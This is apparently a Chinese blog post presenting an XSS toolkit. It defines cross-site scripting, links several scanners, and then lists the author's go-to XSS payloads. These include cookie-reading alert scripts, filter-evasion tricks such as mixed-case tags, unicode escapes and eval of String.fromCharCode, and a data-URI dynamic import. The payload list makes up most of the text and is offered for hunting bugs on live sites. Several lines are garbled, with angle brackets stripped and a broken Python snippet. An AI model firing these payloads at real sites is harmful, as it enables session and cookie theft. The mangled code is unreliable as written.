工具集-XSS Payload

XSS介绍

Cross Site Script(XSS) 是将恶意脚本注入到网站中，当攻击者使用web 程序将恶意脚本发送给不同的用户时，就造成了XSS攻击，XSS攻击发生在web 程序任何输入的地方，其根本问题是web程序没有对输入输出做验证和编码。

XSS漏洞扫描工具

BruteXSS

https://github.com/shawarkhanethicalhacker/BruteXSS

XSStrike

https://github.com/UltimateHackers/XSStrike

XSSer kali 自带

4. xsscrpay

https://github.com/DanMcInerney/xsscrapy

XSS Payload

">

scriPt>alert(document.cookie)/sCript>

img src=/ onerror=confir\u006d(document.cookie)/>script>

\";alert(document.domain);//

;alert(document.domain);//

\";alert(document.domain);//

s='">' print

print

'eval(String.fromCharCode('+",".join([str(ord(o))

for o ins])+'))'

;[].constructor.prototype.join=function();eval('alert(1)')

import('data:text/javascript,alert(1)')

"/ondblclick=`

z

o

这是我常用的XSS payload ，更多payload 移步我的github

https://github.com/crhua/xsspayload.git

总结

利用工具挖掘XSS漏洞效率太低，更多的时候是自己手工测试，多看看前辈们写的payload,挖洞的时候构造自己的payload。